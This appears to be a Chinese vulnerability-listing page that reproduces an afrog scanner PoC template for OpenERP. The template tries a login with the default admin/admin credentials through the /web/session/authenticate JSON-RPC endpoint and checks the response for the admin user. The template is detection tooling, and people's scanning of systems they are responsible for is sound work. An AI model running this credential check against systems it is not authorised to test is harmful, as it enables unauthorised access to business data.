openerp-default-password: Openerp Default Password

日期: 2025-09-01 | 影响软件: Openerp | POC: 已公开

漏洞描述

app="OpenERP"

PoC代码[已公开]

id: openerp-default-password

info:
    name: Openerp Default Password
    author: zan8in
    severity: high
    verified: true
    description: app="OpenERP"

set:
    hosturl: request.url
    r1: md5(randomLowercase(6))
rules:
    r0:
        request:
            method: POST
            path: /web/session/authenticate
            headers:
                Accept: application/json, text/javascript, */*; q=0.01
                Content-Type: application/json
                X-Requested-With: XMLHttpRequest
                Accept-Encoding: gzip, deflate
                Referer: "{{hosturl}}"
                Origin: "{{hosturl}}"
            body: |
                {"jsonrpc":"2.0","method":"call","params":{"db":"OPENERP7","login":"admin","password":"admin","base_location":"{{hosturl}}","session_id":"{{r1}}","context":{}},"id":"r7"}
        expression: |
            response.status == 200 && response.body.bcontains(b"\"username\": \"admin\",")
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/default-pwd/openerp-default-password.yaml

相关漏洞推荐